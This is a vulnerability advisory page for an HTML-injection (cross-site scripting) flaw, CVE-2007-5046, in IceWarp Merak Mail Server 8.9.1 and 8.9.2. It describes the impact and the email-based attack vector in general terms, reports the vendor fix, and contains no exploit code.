Merak Mail Server Email Message HTML Injection Vulnerability
BID:25708
Info
Merak Mail Server Email Message HTML Injection Vulnerability
| Bugtraq ID: | 25708 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5046 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 18 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | MWR InfoSecurity reported this issue. |
| Vulnerable: |
IceWarp Merak Mail Server 8.9.2 IceWarp Merak Mail Server 8.9.1 |
| Not Vulnerable: |
IceWarp Merak Mail Server 9.0 |
Discussion
Merak Mail Server Email Message HTML Injection Vulnerability
Merak Mail Server is prone to an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied input before using it in dynamically generated content.
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
This issue affects Merak Mail Server 8.9.2 and 8.9.1; other versions may also be affected.
Merak Mail Server is prone to an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied input before using it in dynamically generated content.
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
This issue affects Merak Mail Server 8.9.2 and 8.9.1; other versions may also be affected.
Exploit / POC
Merak Mail Server Email Message HTML Injection Vulnerability
Attackers can exploit this issue by sending malicious emails to unsuspecting victims, and enticing the victims into opening the email.
Attackers can exploit this issue by sending malicious emails to unsuspecting victims, and enticing the victims into opening the email.
Solution / Fix
Merak Mail Server Email Message HTML Injection Vulnerability
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
References
Merak Mail Server Email Message HTML Injection Vulnerability
References:
References:
- Merak Mail Server Homepage (IceWarp)
- Merak Webmail XSS Advisory (MWR InfoSecurity)